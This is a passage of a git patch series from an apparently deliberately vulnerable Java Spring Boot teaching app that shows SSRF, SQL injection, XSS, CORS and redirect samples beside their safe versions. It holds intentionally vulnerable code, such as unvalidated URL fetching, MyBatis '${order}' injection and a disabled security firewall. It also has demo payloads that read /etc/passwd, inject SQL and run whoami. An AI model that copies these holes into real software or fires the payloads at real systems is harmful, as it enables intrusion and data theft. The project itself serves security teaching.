+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+
+@Component
+public class DisableSpringSecurityFirewall implements HttpFirewall {
+
+    @Override
+    public FirewalledRequest getFirewalledRequest(HttpServletRequest request) throws RequestRejectedException {
+        return new FirewalledRequest(request) {
+            @Override
+            public void reset() {
+            }
+        };
+    }
+
+    @Override
+    public HttpServletResponse getFirewalledResponse(HttpServletResponse response) {
+        return response;
+    }
+}
diff --git a/src/main/java/org/joychou/security/SecurityUtil.java b/src/main/java/org/joychou/security/SecurityUtil.java
index 809ac544..812c905e 100644
--- a/src/main/java/org/joychou/security/SecurityUtil.java
+++ b/src/main/java/org/joychou/security/SecurityUtil.java
@@ -159,4 +159,50 @@ public static String cmdFilter(String input) {
         return input;
     }
 
+
+    /**
+     * 过滤mybatis中order by不能用#的情况。
+     * 严格限制用户输入只能包含<code>a-zA-Z0-9_-.</code>字符。
+     *
+     * @param sql sql
+     * @return 安全sql，否则返回null
+     */
+    public static String sqlFilter(String sql) {
+        if (!FILTER_PATTERN.matcher(sql).matches()) {
+            return null;
+        }
+        return sql;
+    }
+
+    /**
+     * 将非<code>0-9a-zA-Z/-.</code>的字符替换为空
+     *
+     * @param str 字符串
+     * @return 被过滤的字符串
+     */
+    public static String replaceSpecialStr(String str) {
+        StringBuilder sb = new StringBuilder();
+        str = str.toLowerCase();
+        for(int i = 0; i < str.length(); i++) {
+            char ch = str.charAt(i);
+            // 如果是0-9
+            if (ch >= 48 && ch <= 57 ){
+                sb.append(ch);
+            }
+            // 如果是a-z
+            else if(ch >= 97 && ch <= 122) {
+                sb.append(ch);
+            }
+            else if(ch == '/' || ch == '.' || ch == '-'){
+                sb.append(ch);
+            }
+        }
+
+        return sb.toString();
+    }
+
+    public static void main(String[] args) {
+        System.out.print(replaceSpecialStr("text/ html&(&(asdf"));
+    }
+
 }
\ No newline at end of file
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index 9135b5db..c6b2a184 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -4,6 +4,8 @@ spring.datasource.username=root
 spring.datasource.password=woshishujukumima
 spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
 mybatis.mapper-locations=classpath:mapper/*.xml
+# mybatis SQL log
+logging.level.org.joychou.mapper=debug
 
 # Spring Boot Actuator Vulnerable Config
 management.security.enabled=false
diff --git a/src/main/resources/mapper/UserMapper.xml b/src/main/resources/mapper/UserMapper.xml
index df4344e6..e6894071 100644
--- a/src/main/resources/mapper/UserMapper.xml
+++ b/src/main/resources/mapper/UserMapper.xml
@@ -13,10 +13,17 @@
 	    <!--select * from users where username = #{username}-->
     <!--</select>-->
 
-    <select id="findByUserNameVul2" parameterType="String" resultMap="User">
+    <select id="findByUserNameVuln02" parameterType="String" resultMap="User">
         select * from users where username like '%${_parameter}%'
     </select>
 
+    <select id="findByUserNameVuln03" parameterType="String" resultMap="User">
+        select * from users
+        <if test="order != null">
+            order by ${order} asc
+        </if>
+    </select>
+
     <select id="findById" resultMap="User">
         select * from users where id = #{id}
     </select>
diff --git a/src/main/resources/templates/index.html b/src/main/resources/templates/index.html
index 64737751..de32f6ee 100644
--- a/src/main/resources/templates/index.html
+++ b/src/main/resources/templates/index.html
@@ -13,7 +13,7 @@
         <a th:href="@{/file/pic}">FileUpload</a>&nbsp;&nbsp;
         <a th:href="@{cors/sec/originFilter}">Cors</a>&nbsp;&nbsp;
         <a th:href="@{/path_traversal/vul?filepath=../../../../../etc/passwd}">PathTraversal</a>&nbsp;&nbsp;
-        <a th:href="@{/sqli/jdbc/vul?username=joychou}">SqlInject</a>&nbsp;&nbsp;
+        <a th:href="@{sqli/mybatis/vuln01?username=joychou' or '1'='1}">SqlInject</a>&nbsp;&nbsp;
         <a th:href="@{/ssrf/urlConnection?url=file:///etc/passwd}">SSRF</a>&nbsp;&nbsp;
         <a th:href="@{/rce/exec?cmd=whoami}">RCE</a>&nbsp;&nbsp;
         <a th:href="@{/ooxml/upload}">ooxml XXE</a>&nbsp;&nbsp;
diff --git a/src/main/resources/templates/uploadStatus.html b/src/main/resources/templates/uploadStatus.html
deleted file mode 100755
index f39fa45c..00000000
--- a/src/main/resources/templates/uploadStatus.html
+++ /dev/null
@@ -1,10 +0,0 @@
-<!DOCTYPE html>
-<html lang="en" xmlns:th="http://www.thymeleaf.org">
-<body>
-
-<div th:if="${message}">
-    <h4 th:text="${message}"/>
-</div>
-
-</body>
-</html>
\ No newline at end of file

From db6bff2fc2d87b53ab1821cd88bd807e19aeba25 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Thu, 26 Mar 2020 10:28:11 +0800
Subject: [PATCH 072/108] Bug fix.The method of fix ssrf can cause dos.

---
 .../java/org/joychou/controller/SSRF.java     | 50 +++++++++----------
 src/main/java/org/joychou/controller/XSS.java | 20 ++------
 .../org/joychou/security/SSRFChecker.java     | 17 +++++--
 .../org/joychou/security/SecurityUtil.java    |  9 ++--
 .../joychou/security/WebSecurityConfig.java   |  7 +--
 5 files changed, 47 insertions(+), 56 deletions(-)

diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java
index 901f8b70..ec6dfc54 100644
--- a/src/main/java/org/joychou/controller/SSRF.java
+++ b/src/main/java/org/joychou/controller/SSRF.java
@@ -23,16 +23,15 @@
 
 
 import javax.imageio.ImageIO;
-import javax.servlet.http.HttpServletRequest;
 import javax.servlet.http.HttpServletResponse;
 import java.io.*;
 import java.net.*;
 
 
 /**
- * @author  JoyChou (joychou@joychou.org)
- * @date    2017.12.28
- * @desc    Java ssrf vuls code.
+ * Java SSRF vuln or security code.
+ *
+ * @author JoyChou @2017-12-28
  */
 
 @RestController
@@ -42,15 +41,14 @@ public class SSRF {
     private static Logger logger = LoggerFactory.getLogger(SSRF.class);
 
     @RequestMapping("/urlConnection")
-    public static String ssrf_URLConnection(HttpServletRequest request)
+    public static String ssrf_URLConnection(@RequestParam String url)
     {
         try {
-            String url = request.getParameter("url");
             URL u = new URL(url);
             URLConnection urlConnection = u.openConnection();
             BufferedReader in = new BufferedReader(new InputStreamReader(urlConnection.getInputStream())); //send request
             String inputLine;
-            StringBuffer html = new StringBuffer();
+            StringBuilder html = new StringBuilder();
 
             while ((inputLine = in.readLine()) != null) {
                 html.append(inputLine);
@@ -58,7 +56,7 @@ public static String ssrf_URLConnection(HttpServletRequest request)
             in.close();
             return html.toString();
         }catch(Exception e) {
-            e.printStackTrace();
+            logger.error(e.toString());
             return "fail";
         }
     }
@@ -66,16 +64,15 @@ public static String ssrf_URLConnection(HttpServletRequest request)
 
     @RequestMapping("/HttpURLConnection")
     @ResponseBody
-    public static String ssrf_httpURLConnection(HttpServletRequest request)
+    public static String ssrf_httpURLConnection(@RequestParam String url)
     {
         try {
-            String url = request.getParameter("url");
             URL u = new URL(url);
             URLConnection urlConnection = u.openConnection();
             HttpURLConnection httpUrl = (HttpURLConnection)urlConnection;
             BufferedReader in = new BufferedReader(new InputStreamReader(httpUrl.getInputStream())); //send request
             String inputLine;
-            StringBuffer html = new StringBuffer();
+            StringBuilder html = new StringBuilder();
 
             while ((inputLine = in.readLine()) != null) {
                 html.append(inputLine);
@@ -83,7 +80,7 @@ public static String ssrf_httpURLConnection(HttpServletRequest request)
             in.close();
             return html.toString();
         }catch(Exception e) {
-            e.printStackTrace();
+            logger.error(e.toString());
             return "fail";
         }
     }
@@ -91,13 +88,12 @@ public static String ssrf_httpURLConnection(HttpServletRequest request)
 
     @RequestMapping("/Request")
     @ResponseBody
-    public static String ssrf_Request(HttpServletRequest request)
+    public static String ssrf_Request(@RequestParam String url)
     {
         try {
-            String url = request.getParameter("url");
             return Request.Get(url).execute().returnContent().toString();
         }catch(Exception e) {
-            e.printStackTrace();
+            logger.error(e.toString());
             return "fail";
         }
     }
@@ -113,10 +109,9 @@ public static String ssrf_Request(HttpServletRequest request)
      */
     @RequestMapping("/openStream")
     @ResponseBody
-    public static void ssrf_openStream (HttpServletRequest request, HttpServletResponse response) throws IOException {
+    public static void ssrf_openStream (@RequestParam String url, HttpServletResponse response) throws IOException {
         InputStream inputStream = null;
         OutputStream outputStream = null;
-        String url = request.getParameter("url");
         try {
             String downLoadImgFileName = Files.getNameWithoutExtension(url) + "." + Files.getFileExtension(url);
             // download
@@ -132,7 +127,7 @@ public static void ssrf_openStream (HttpServletRequest request, HttpServletRespo
             }
 
         }catch (Exception e) {
-            e.printStackTrace();
+            logger.error(e.toString());
         }finally {
             if (inputStream != null) {
                 inputStream.close();
@@ -147,20 +142,19 @@ public static void ssrf_openStream (HttpServletRequest request, HttpServletRespo
 
     @RequestMapping("/ImageIO")
     @ResponseBody
-    public static void ssrf_ImageIO(HttpServletRequest request) {
-        String url = request.getParameter("url");
+    public static void ssrf_ImageIO(@RequestParam String url) {
         try {
             URL u = new URL(url);
             ImageIO.read(u); // send request
         } catch (Exception e) {
+            logger.error(e.toString());
         }
     }
 
 
     @RequestMapping("/okhttp")
     @ResponseBody
-    public static void ssrf_okhttp(HttpServletRequest request) throws IOException {
-        String url = request.getParameter("url");
+    public static void ssrf_okhttp(@RequestParam String url) throws IOException {
         OkHttpClient client = new OkHttpClient();
         com.squareup.okhttp.Request ok_http = new com.squareup.okhttp.Request.Builder().url(url).build();
         client.newCall(ok_http).execute();
@@ -180,8 +174,8 @@ public static String ssrf_HttpClient(@RequestParam String url) {
         try {
             HttpResponse httpResponse = client.execute(httpGet); // send request
             BufferedReader rd = new BufferedReader(new InputStreamReader(httpResponse.getEntity().getContent()));
-            StringBuffer result = new StringBuffer();
-            String line = "";
+            StringBuilder result = new StringBuilder();
+            String line = null;
             while ((line = rd.readLine()) != null) {
                 result.append(line);
             }
@@ -236,8 +230,8 @@ public static String commonsHttpClient(@RequestParam String url) {
 
     /**
      * jsoup是一款Java的HTML解析器，可直接解析某个URL地址、HTML文本内容。
-     * http://localhost:8080/ssrf/Jsoup?url=http://www.baidu.com
      *
+     * http://localhost:8080/ssrf/Jsoup?url=http://www.baidu.com
      */
     @RequestMapping("/Jsoup")
     @ResponseBody
@@ -251,9 +245,11 @@ public static String Jsoup(@RequestParam String url) {
                     .cookie("name", "joychou") // request请求带的cookie
                     .followRedirects(false)
                     .execute().parse();
+            logger.info(doc.html());
         } catch (MalformedURLException e) {
             return "exception: " + e.toString();
-        } catch (Exception e) {
+        } catch (IOException e) {
+            logger.error(e.toString());
             return "exception: " + e.toString();
         }
 
@@ -271,7 +267,7 @@ public static String Jsoup(@RequestParam String url) {
     public static String IOUtils(@RequestParam String url) {
         try {
             // IOUtils.toByteArray内部用URLConnection进行了封装
-            byte[] b = IOUtils.toByteArray(URI.create(url));
+            IOUtils.toByteArray(URI.create(url));
         } catch (Exception e) {
             return "exception: " + e.toString();
         }
diff --git a/src/main/java/org/joychou/controller/XSS.java b/src/main/java/org/joychou/controller/XSS.java
index fcd5d7f5..68e89c0c 100644
--- a/src/main/java/org/joychou/controller/XSS.java
+++ b/src/main/java/org/joychou/controller/XSS.java
@@ -1,35 +1,24 @@
 package org.joychou.controller;
 
 import org.apache.commons.lang.StringUtils;
-import org.joychou.dao.User;
-import org.joychou.mapper.UserMapper;
-import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.beans.factory.annotation.Value;
 import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.CookieValue;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 
-import javax.annotation.Resource;
 import javax.servlet.http.Cookie;
-import javax.servlet.http.HttpServletRequest;
 import javax.servlet.http.HttpServletResponse;
-import java.sql.Connection;
-import java.sql.DriverManager;
-import java.sql.Statement;
+
 
 /**
- * @author   JoyChou (joychou@joychou.org)
- * @date     2018.01.02
- * @desc     XSS vuls code
+ * @author JoyChou @2018-01-02
  */
-
 @Controller
 @RequestMapping("/xss")
 public class XSS {
 
     /**
-     * Vul Code.
+     * Vuln Code.
      * ReflectXSS
      * http://localhost:8080/xss/reflect?xss=<script>alert(1)</script>
      *
@@ -71,6 +60,7 @@ public String show(@CookieValue("xss") String xss)
     {
         return xss;
     }
+
     /**
      * safe Code.
      * http://localhost:8080/xss/safe
@@ -82,7 +72,7 @@ public static String safe(String xss){
         return encode(xss);
     }
 
-    public static String encode(String origin) {
+    private static String encode(String origin) {
         origin = StringUtils.replace(origin, "&", "&amp;");
         origin = StringUtils.replace(origin, "<", "&lt;");
         origin = StringUtils.replace(origin, ">", "&gt;");
diff --git a/src/main/java/org/joychou/security/SSRFChecker.java b/src/main/java/org/joychou/security/SSRFChecker.java
index 08d9053a..bb959a23 100644
--- a/src/main/java/org/joychou/security/SSRFChecker.java
+++ b/src/main/java/org/joychou/security/SSRFChecker.java
@@ -8,21 +8,24 @@
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 
-public class SSRFChecker {
+class SSRFChecker {
 
-    private static int connectTime = 5*1000;  // 设置连接超时时间5s
     private static Logger logger = LoggerFactory.getLogger(SSRFChecker.class);
+
     /**
      * 解析url的ip，判断ip是否是内网ip，所以TTL设置为0的情况不适用。
      * url只允许https或者http，并且设置默认连接超时时间。
      * 该修复方案会主动请求重定向后的链接。最好用Hook方式获取到所有url后，进行判断，代码待续…
      *
      * @param url check的url
+     * @param checkTimes 设置重定向检测的最大次数，建议设置为10次
      * @return 安全返回true，危险返回false
      */
-    public static Boolean checkSSRF(String url) {
+    static Boolean checkSSRF(String url, int checkTimes) {
 
         HttpURLConnection connection;
+        int connectTime = 5*1000;  // 设置连接超时时间5s
+        int i = 1;
         String finalUrl = url;
         try {
             do {
@@ -45,7 +48,11 @@ public static Boolean checkSSRF(String url) {
                     if (null == redirectedUrl)
                         break;
                     finalUrl = redirectedUrl;
-                    // System.out.println("redirected url: " + finalUrl);
+                    i += 1;  // 重定向次数加1
+                    logger.info("redirected url: " + finalUrl);
+                    if(i == checkTimes) {
+                        return false;
+                    }
                 } else
                     break;
             } while (connection.getResponseCode() != HttpURLConnection.HTTP_OK);
@@ -62,7 +69,7 @@ public static Boolean checkSSRF(String url) {
      *
      * @return 如果是内网IP，返回true；非内网IP，返回false。
      */
-    public static Boolean isInnerIPByUrl(String url) {
+     static Boolean isInnerIPByUrl(String url) {
         String host = url2host(url);
         if (host.equals("")) {
             return true; // 异常URL当成内网IP等非法URL处理
diff --git a/src/main/java/org/joychou/security/SecurityUtil.java b/src/main/java/org/joychou/security/SecurityUtil.java
index 812c905e..bb154dc4 100644
--- a/src/main/java/org/joychou/security/SecurityUtil.java
+++ b/src/main/java/org/joychou/security/SecurityUtil.java
@@ -91,11 +91,8 @@ public static String checkUrlByGuava(String url, String[] urlwhitelist){
      * @return 安全返回true，危险返回false
      */
     public static Boolean checkSSRF(String url) {
-        if (SSRFChecker.checkSSRF(url)) {
-            return true;
-        } else {
-            return false;
-        }
+        int checkTimes = 10;
+        return SSRFChecker.checkSSRF(url, checkTimes);
     }
 
 
@@ -143,7 +140,7 @@ public static String pathFilter(String filepath) {
             }
         }
 
-        if (temp.indexOf("..") != -1 || temp.charAt(0) == '/') {
+        if (temp.contains("..") || temp.charAt(0) == '/') {
             return null;
         }
 
diff --git a/src/main/java/org/joychou/security/WebSecurityConfig.java b/src/main/java/org/joychou/security/WebSecurityConfig.java
index 27a332c3..a9787aac 100644
--- a/src/main/java/org/joychou/security/WebSecurityConfig.java
+++ b/src/main/java/org/joychou/security/WebSecurityConfig.java
@@ -43,7 +43,7 @@ public class WebSecurityConfig extends WebSecurityConfigurerAdapter {
         public boolean matches(HttpServletRequest request) {
 
             // 配置需要CSRF校验的请求方式，
-            HashSet<String> allowedMethods = new HashSet<String>(Arrays.asList(csrfMethod));
+            HashSet<String> allowedMethods = new HashSet<>(Arrays.asList(csrfMethod));
             // return false表示不校验csrf
             if (!csrfEnabled) {
                 return false;
@@ -74,7 +74,8 @@ protected void configure(HttpSecurity http) throws Exception {
                 .successHandler(new LoginSuccessHandler())
                 .failureHandler(new LoginFailureHandler()).and()
                 .logout().logoutUrl("/logout").permitAll().and()
-                .rememberMe(); // tomcat默认JSESSION会话有效时间为30分钟，所以30分钟不操作会话将过期。为了解决这一问题，引入rememberMe功能。
+                // tomcat默认JSESSION会话有效时间为30分钟，所以30分钟不操作会话将过期。为了解决这一问题，引入rememberMe功能。
+                .rememberMe();
     }
 
     /**
@@ -84,7 +85,7 @@ protected void configure(HttpSecurity http) throws Exception {
     CorsConfigurationSource corsConfigurationSource()
     {
         // Set cors origin white list
-        ArrayList<String> allowOrigins = new ArrayList<String>();
+        ArrayList<String> allowOrigins = new ArrayList<>();
         allowOrigins.add("joychou.org");
         allowOrigins.add("https://test.joychou.me"); // 区分http和https，并且默认不会拦截同域请求。
 

From fc1be1bbbbcdfefe61783a47330c99c3366d46ab Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 27 Mar 2020 22:28:31 +0800
Subject: [PATCH 073/108] Add bean to parse safedomain

---
 src/main/java/org/joychou/Application.java    |  1 +
 .../org/joychou/config/CustomCorsConfig.java  |  6 +-
 .../org/joychou/config/SafeDomainConfig.java  | 28 ++++++++
 .../org/joychou/config/SafeDomainParser.java  | 57 +++++++++++++++
 .../java/org/joychou/config/WebConfig.java    | 10 +++
 .../java/org/joychou/controller/Cors.java     |  4 +-
 .../org/joychou/controller/URLRedirect.java   | 10 +--
 .../org/joychou/controller/jsonp/JSONP.java   |  8 +--
 .../java/org/joychou/filter/JsonpFilter.java  |  5 +-
 .../java/org/joychou/filter/OriginFilter.java |  4 +-
 .../java/org/joychou/filter/ReferFilter.java  |  2 +-
 .../joychou/security/CustomCorsProcessor.java | 17 ++---
 .../org/joychou/security/SecurityUtil.java    | 69 ++++++-------------
 src/main/resources/url/safe_domain.xml        |  7 ++
 14 files changed, 145 insertions(+), 83 deletions(-)
 create mode 100644 src/main/java/org/joychou/config/SafeDomainConfig.java
 create mode 100644 src/main/java/org/joychou/config/SafeDomainParser.java
 create mode 100644 src/main/resources/url/safe_domain.xml

diff --git a/src/main/java/org/joychou/Application.java b/src/main/java/org/joychou/Application.java
index 41169b9a..0f04b2c8 100644
--- a/src/main/java/org/joychou/Application.java
+++ b/src/main/java/org/joychou/Application.java
@@ -8,6 +8,7 @@
 import org.springframework.cloud.netflix.eureka.EnableEurekaClient;
 
 
+
 @ServletComponentScan // do filter
 @SpringBootApplication
 // @EnableEurekaClient  // 测试Eureka请打开注释，防止控制台一直有warning
diff --git a/src/main/java/org/joychou/config/CustomCorsConfig.java b/src/main/java/org/joychou/config/CustomCorsConfig.java
index d18a285e..8b80e664 100644
--- a/src/main/java/org/joychou/config/CustomCorsConfig.java
+++ b/src/main/java/org/joychou/config/CustomCorsConfig.java
@@ -20,10 +20,10 @@ public WebMvcConfigurer corsConfigurer() {
         return new WebMvcConfigurerAdapter() {
             @Override
             public void addCorsMappings(CorsRegistry registry) {
-                // 支持一级域名，因为重写了checkOrigin
-                String[] allowOrigins = {"joychou.org", "http://test.joychou.me"};
+                // 为了支持一级域名，重写了checkOrigin
+                //String[] allowOrigins = {"joychou.org", "http://test.joychou.me"};
                 registry.addMapping("/cors/sec/webMvcConfigurer") // /**表示所有路由path
-                        .allowedOrigins(allowOrigins)
+                        //.allowedOrigins(allowOrigins)
                         .allowedMethods("GET", "POST")
                         .allowCredentials(true);
             }
diff --git a/src/main/java/org/joychou/config/SafeDomainConfig.java b/src/main/java/org/joychou/config/SafeDomainConfig.java
new file mode 100644
index 00000000..d0fb91a7
--- /dev/null
+++ b/src/main/java/org/joychou/config/SafeDomainConfig.java
@@ -0,0 +1,28 @@
+package org.joychou.config;
+
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+
+
+/**
+ * 为了不要每次调用都解析safedomain的xml，所以将解析动作放在bean里。
+ */
+@Configuration
+public class SafeDomainConfig {
+
+    private static final Logger LOGGER = LoggerFactory.getLogger(SafeDomainConfig.class);
+
+    @Bean
+    public SafeDomainParser safeDomainParser() {
+        try {
+            LOGGER.info("SafeDomainParser bean inject successfully!!!");
+            return new SafeDomainParser();
+        } catch (Exception e) {
+            LOGGER.error("SafeDomainParser is null " + e.getMessage(), e);
+        }
+        return null;
+    }
+
+}
diff --git a/src/main/java/org/joychou/config/SafeDomainParser.java b/src/main/java/org/joychou/config/SafeDomainParser.java
new file mode 100644
index 00000000..8c21e598
--- /dev/null
+++ b/src/main/java/org/joychou/config/SafeDomainParser.java
@@ -0,0 +1,57 @@
+package org.joychou.config;
+
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.core.io.ClassPathResource;
+import org.w3c.dom.Document;
+import org.w3c.dom.Node;
+import org.w3c.dom.NodeList;
+
+import javax.xml.parsers.DocumentBuilder;
+import javax.xml.parsers.DocumentBuilderFactory;
+import java.io.File;
+import java.util.ArrayList;
+
+public class SafeDomainParser {
+
+    private static Logger logger= LoggerFactory.getLogger(SafeDomainParser.class);
+
+    public SafeDomainParser(){
+
+        String safeTag = "safedomain";
+        String domainSafeTag = "domain";
+        String safeDomainClassPath = "url" + File.separator + "safe_domain.xml";
+        ArrayList<String> safeDomains = new ArrayList<>();
+
+        try {
+            // 读取resources目录下的文件
+            ClassPathResource resource = new ClassPathResource(safeDomainClassPath);
+            File file = resource.getFile();
+
+            DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
+            DocumentBuilder db = dbf.newDocumentBuilder();
+            Document doc = db.parse(file);  // parse xml
+
+            NodeList rootNode = doc.getElementsByTagName(safeTag);
+            Node domainsNode = rootNode.item(0);
+            NodeList child = domainsNode.getChildNodes();
+            
+            for (int i = 0; i < child.getLength(); i++){
+                Node node = child.item(i);
+                if (node.getNodeName().equals(domainSafeTag)) {
+                    safeDomains.add(node.getTextContent());
+                }
+            }
+
+        }catch (Exception e){
+            logger.error(e.toString());
+        }
+
+        WebConfig wc = new WebConfig();
+        wc.setSafeDomains(safeDomains);
+    }
+}
+
+
+
+
diff --git a/src/main/java/org/joychou/config/WebConfig.java b/src/main/java/org/joychou/config/WebConfig.java
index 96d7f0f5..7eb3290a 100644
--- a/src/main/java/org/joychou/config/WebConfig.java
+++ b/src/main/java/org/joychou/config/WebConfig.java
@@ -3,6 +3,8 @@
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.stereotype.Component;
 
+import java.util.ArrayList;
+
 
 /**
  * Solve can't get value in filter by @Value when not using embed tomcat.
@@ -19,6 +21,7 @@ public class WebConfig {
     private static String[] referUris;
     private static Boolean referSecEnabled = false;
     private static String businessCallback;
+    private static ArrayList<String> safeDomains= new ArrayList<>();
 
     /**
      * application.properties里object自动转jsonp的referer校验开关
@@ -91,4 +94,11 @@ public static String getBusinessCallback(){
         return businessCallback;
     }
 
+
+    public void setSafeDomains(ArrayList<String> safeDomains){
+        WebConfig.safeDomains = safeDomains;
+    }
+    public static ArrayList<String> getSafeDomains(){
+        return safeDomains;
+    }
 }
\ No newline at end of file
diff --git a/src/main/java/org/joychou/controller/Cors.java b/src/main/java/org/joychou/controller/Cors.java
index adb069a9..3537ecf8 100644
--- a/src/main/java/org/joychou/controller/Cors.java
+++ b/src/main/java/org/joychou/controller/Cors.java
@@ -20,8 +20,6 @@
 public class Cors {
 
     private static String info = "{\"name\": \"JoyChou\", \"phone\": \"18200001111\"}";
-    private static String[] urlwhitelist = {"joychou.org", "joychou.me"};
-
 
     @RequestMapping("/vuln/origin")
     public static String vuls1(HttpServletRequest request, HttpServletResponse response) {
@@ -108,7 +106,7 @@ public String seccode(HttpServletRequest request, HttpServletResponse response)
 
         // 如果origin不为空并且origin不在白名单内，认定为不安全。
         // 如果origin为空，表示是同域过来的请求或者浏览器直接发起的请求。
-        if ( origin != null && SecurityUtil.checkURLbyEndsWith(origin, urlwhitelist) == null ) {
+        if ( origin != null && SecurityUtil.checkURL(origin) == null ) {
             return "Origin is not safe.";
         }
         response.setHeader("Access-Control-Allow-Origin", origin);
diff --git a/src/main/java/org/joychou/controller/URLRedirect.java b/src/main/java/org/joychou/controller/URLRedirect.java
index dfd220f2..d2b3b484 100644
--- a/src/main/java/org/joychou/controller/URLRedirect.java
+++ b/src/main/java/org/joychou/controller/URLRedirect.java
@@ -75,14 +75,14 @@ public static void forward(HttpServletRequest request, HttpServletResponse respo
 
     /**
      * Safe code of sendRedirect.
-     * http://localhost:8080/urlRedirect/sendRedirect_seccode?url=http://www.baidu.com
+     * http://localhost:8080/urlRedirect/sendRedirect/sec?url=http://www.baidu.com
      */
-    @RequestMapping("/sendRedirect_seccode")
+    @RequestMapping("/sendRedirect/sec")
     @ResponseBody
-    public static void sendRedirect_seccode(HttpServletRequest request, HttpServletResponse response) throws IOException{
+    public void sendRedirect_seccode(HttpServletRequest request, HttpServletResponse response)
+            throws IOException{
         String url = request.getParameter("url");
-        String urlwhitelist[] = {"joychou.org", "joychou.com"};
-        if (SecurityUtil.checkURLbyEndsWith(url, urlwhitelist) == null) {
+        if (SecurityUtil.checkURL(url) == null) {
             // Redirect to error page.
             response.sendRedirect("https://test.joychou.org/error3.html");
             return;
diff --git a/src/main/java/org/joychou/controller/jsonp/JSONP.java b/src/main/java/org/joychou/controller/jsonp/JSONP.java
index da2474fa..e2dfc8eb 100644
--- a/src/main/java/org/joychou/controller/jsonp/JSONP.java
+++ b/src/main/java/org/joychou/controller/jsonp/JSONP.java
@@ -24,13 +24,11 @@
  * https://github.com/JoyChou93/java-sec-code/wiki/JSONP
  */
 
-
 @RestController
 @RequestMapping("/jsonp")
 public class JSONP {
 
-    private static String[] urlwhitelist = {"joychou.com", "joychou.org"};
-    private static String callback = WebConfig.getBusinessCallback();
+    private String callback = WebConfig.getBusinessCallback();
 
     // get current login username
     public static String getUserInfo2JsonStr(HttpServletRequest request) {
@@ -65,7 +63,7 @@ public String referer(HttpServletRequest request) {
     public String emptyReferer(HttpServletRequest request) {
         String referer = request.getHeader("referer");
 
-        if (null != referer && SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist) == null) {
+        if (null != referer && SecurityUtil.checkURL(referer) == null) {
             return "error";
         }
         String callback = request.getParameter(this.callback);
@@ -110,7 +108,7 @@ public ModelAndView mappingJackson2JsonView(HttpServletRequest req) {
     public String safecode(HttpServletRequest request) {
         String referer = request.getHeader("referer");
 
-        if (SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist) == null) {
+        if (SecurityUtil.checkURL(referer) == null) {
             return "error";
         }
         String callback = request.getParameter(this.callback);
diff --git a/src/main/java/org/joychou/filter/JsonpFilter.java b/src/main/java/org/joychou/filter/JsonpFilter.java
index 5027caac..7c16d9d2 100644
--- a/src/main/java/org/joychou/filter/JsonpFilter.java
+++ b/src/main/java/org/joychou/filter/JsonpFilter.java
@@ -39,7 +39,6 @@ public void doFilter(ServletRequest req, ServletResponse res, FilterChain filter
         HttpServletResponse response = (HttpServletResponse) res;
 
         String refer = request.getHeader("referer");
-        String[] jsonpReferWhitelist = WebConfig.getJsonpReferWhitelist();
         StringBuffer url = request.getRequestURL();
         String query = request.getQueryString();
 
@@ -50,7 +49,7 @@ public void doFilter(ServletRequest req, ServletResponse res, FilterChain filter
         }
 
         // 校验jsonp逻辑，如果不安全，返回forbidden
-        if (SecurityUtil.checkUrlByGuava(refer, jsonpReferWhitelist) == null ){
+        if (SecurityUtil.checkURL(refer) == null ){
             logger.error("[-] URL: " + url + "?" + query + "\t" + "Referer: " + refer);
             response.setStatus(HttpServletResponse.SC_FORBIDDEN);
             response.getWriter().write("forbidden");
@@ -87,7 +86,7 @@ private boolean check(HttpServletRequest req) {
                 break;
             }
         }
-        if (StringUtils.isBlank(reqCallback)){
+        if(StringUtils.isBlank(reqCallback)){
             return false;
         }
 
diff --git a/src/main/java/org/joychou/filter/OriginFilter.java b/src/main/java/org/joychou/filter/OriginFilter.java
index 0c40c25f..4e2e9716 100644
--- a/src/main/java/org/joychou/filter/OriginFilter.java
+++ b/src/main/java/org/joychou/filter/OriginFilter.java
@@ -20,8 +20,6 @@
 @WebFilter(filterName = "OriginFilter", urlPatterns = "/cors/sec/originFilter")
 public class OriginFilter implements Filter {
 
-    private static String[] urlwhitelist = {"joychou.org", "joychou.me"};
-
     @Override
     public void init(FilterConfig filterConfig) throws ServletException {
 
@@ -40,7 +38,7 @@ public void doFilter(ServletRequest req, ServletResponse res, FilterChain filter
         logger.info("[+] Origin: " + origin + "\tCurrent url:" + request.getRequestURL());
 
         // 以file协议访问html，origin为字符串的null，所以依然会走安全check逻辑
-        if ( origin != null && SecurityUtil.checkURLbyEndsWith(origin, urlwhitelist) == null) {
+        if ( origin != null && SecurityUtil.checkURL(origin) == null) {
             logger.error("[-] Origin check error. " + "Origin: " + origin +
                     "\tCurrent url:" + request.getRequestURL());
             response.setStatus(response.SC_FORBIDDEN);
diff --git a/src/main/java/org/joychou/filter/ReferFilter.java b/src/main/java/org/joychou/filter/ReferFilter.java
index 14f1a618..f8803181 100644
--- a/src/main/java/org/joychou/filter/ReferFilter.java
+++ b/src/main/java/org/joychou/filter/ReferFilter.java
@@ -64,7 +64,7 @@ public void doFilter(ServletRequest req, ServletResponse res, FilterChain filter
         String reqCallback = request.getParameter(WebConfig.getBusinessCallback());
         if ("GET".equals(request.getMethod()) && StringUtils.isNotBlank(reqCallback) ){
             // If the check of referer fails, a 403 forbidden error page will be returned.
-            if (SecurityUtil.checkURLbyEndsWith(refer, WebConfig.getReferWhitelist()) == null ){
+            if (SecurityUtil.checkURL(refer) == null ){
                 logger.info("[-] URL: " + request.getRequestURL() + "?" + request.getQueryString() + "\t"
                         + "Referer: " + refer);
